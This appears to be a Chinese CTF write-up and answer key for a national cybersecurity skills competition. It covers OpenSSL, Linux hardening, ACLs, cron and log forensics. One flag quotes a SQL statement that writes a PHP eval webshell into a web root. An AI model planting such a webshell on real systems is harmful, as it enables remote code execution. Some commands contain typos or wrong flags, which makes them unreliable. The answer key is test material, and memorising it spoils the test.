使用openssl工具对/opt/document.txt文件进行SHA-256算法进行校验,将命令作为flag提交
根据题目要求,命令为 openssl dgst -sha256 /opt/document.txt 去除空格作为flag
flag: openssldgst-sha256/opt/document.txt
使用私钥对secret.enc进行解密,将解密后的内容作为flag提交
使用命令 openssl rsautl -decrypt -in secret.enc -inkey private_key.pem -out flag.txt,获取flag.txt,
flag: flag{you_re_very_good_at_crypto}
根据私钥创建公钥文件public_key.pem,将命令作为flag提交(参数顺序按照参数字段的字数从短到长排序)
创建公钥的命令为 openssl rsa -in private_key.pem -out public_key.pem -pubout 去除空格作为flag
flag: opensslrsa-inprivate_key.pem-outpublic_key.pem-pubout
使用公钥public_key.pem和签名文件document.sha256验证document.txt是否被篡改,将校验后输出的结果作为flag提交
签名验证的命令为 openssl dgst -sha1 -verify public_key.pemm -signature document.sha256 document.txt ,返回结果为 Verification Failure,去除空格,转小写为flag
flag: verificationfailure
mysql的命令历史文件中会包含许多历史操作记录,如登录时将密码直接跟在-p参数后,则会将明文密码记录到历史文件中。为防止敏感信息泄漏,删除该文件,将该文件的绝对路径作为flag提交
尝试一下登录操作,就会生成该文件,该文件的绝对路径为 /root/.mysql_history
flag: /root/.mysql_history
你负责一个系统的安全,该系统需要执行更严格的密码策略。配置口令更换周期为90天,将修改的配置文件地址和添加的配置项直接拼接作为flag提交
配置文件地址为/etc/login.defs,密码最大有效期 PASS_MAX_DAYS 90,
flag: /etc/login.defspass_max_days90
你负责一个系统的安全,该系统需要执行更严格的密码策略。配置口令更改最小间隔天数为6天,将修改的配置文件地址和添加的配置项直接拼接作为flag提交
配置文件地址为/etc/login.defs,两次修改密码的最小间隔时间 PASS_MIN_DAYS 6
flag: /etc/login.defspass_min_days6
你负责一个系统的安全,该系统需要执行更严格的密码策略。配置口令过期前警告天数为30天,将修改的配置文件地址和添加的配置项直接拼接作为flag提交
配置文件地址为/etc/login.defs,#密码过期前多少天开始提示PASS_WARN_AGE 30
flag: /etc/login.defspass_warn_age30
创建tom用户,同时让tom用户登入时直接进入python3解释器,将命令作为flag提交
根据题目要求,命令为 useradd -s /usr/bin/python3 tom,去除空格作为flag
flag: useradd-s/usr/bin/python3tom
为tom用户分配特定数据集的权限。这个数据集位于/var/securedata目录下,需要在不修改原有权限的情况下,令tom能够读取和写入该目录及其下的文件,将授权的ACL命令作为flag提交(参数顺序按照参数内容的字数从短到长排序)
根据题目要求,命令为 setfacl -r -m u:tom:rw/var/securedata,去除空格作为flag,去除空格作为flag
flag: setfacl-r-mu:tom:rw/var/securedata
需要每天对/var/securedata进行备份,请将编辑计划任务的命令作为flag提交
编辑计划任务的命令 为 crontab -e 去除空格作为flag
flag: crontab-e
需要每天对/var/securedata进行备份,计划每天0点0分0秒时将数据全量备份至/opt下,请提交计划任务的配置
题目要求对应 crontab 配置为 0 0 * * * cp -r /var/securedata /opt
flag: 00***cp-r/var/securedata/opt
分析数据库的历史general log,找出写出了木马文件的SQL语句。将这个SQL语句作为flag提交
导出/opt 目录下的 exec_log,搜索 into outfile,得到
flag: select"<?phpeval(@$_POST['a']);?>"intooutfile'/usr/local/nginx/html/webshell101.php'
找出导致木马写入的配置项,并将配置该行作为flag提交
相关配置在 my.ini 文件中,
flag: secure_file_priv=/
请使用文件粉碎工具将木马文件安全地粉碎10次,以确保其数据无法恢复。将你执行粉碎操作命令作为flag提交
前面的sql语句得知木马文件的路径,linux 粉碎工具 为 shred,所以粉碎命令为:shred -n 10 /usr/local/nginx/html/webshell101.php
flag: shred-n10/usr/local/nginx/html/webshell101.php
在/opt/data文件夹下搜索被恶意修改过的文件。使用命令行工具进行高效搜索,并将找到文件的内容为flag提交
ls -la,然后查看日期不对的文件,发现file2988日期不对,长度也不对,只有24,里面有
flag: flag{you_found_it_haha}
修复/opt/data目录的权限问题。你需要设置test用户拥有此目录的完全权限,而admin组只能查看,其他人没有权限。使用命令行设置权限后,将文件夹ugo的权限以八进制形式作为flag提交
根据题目要求,该目录权限应为 rwxr—–,应该740,但是经过测试,770为正确flag
flag: 770
从安全设备上截取到一张缺失的图片,放在/opt/flag.zip中,现怀疑内含有可疑数据,请对图片进行分析,然后将可疑数据作为flag提交
将图片拖进010ditor,发现在图片尾部的四个chunk的crc报错,
查看发现是 IDAT 标识符被删除,
补上后图片正常显示,但是没发现flag,后面经过测试,发现对图片进行fft变换可以有flag字符串
原文始发于微信公众号(Van1sh):全国网络安全行业职业技能大赛-初赛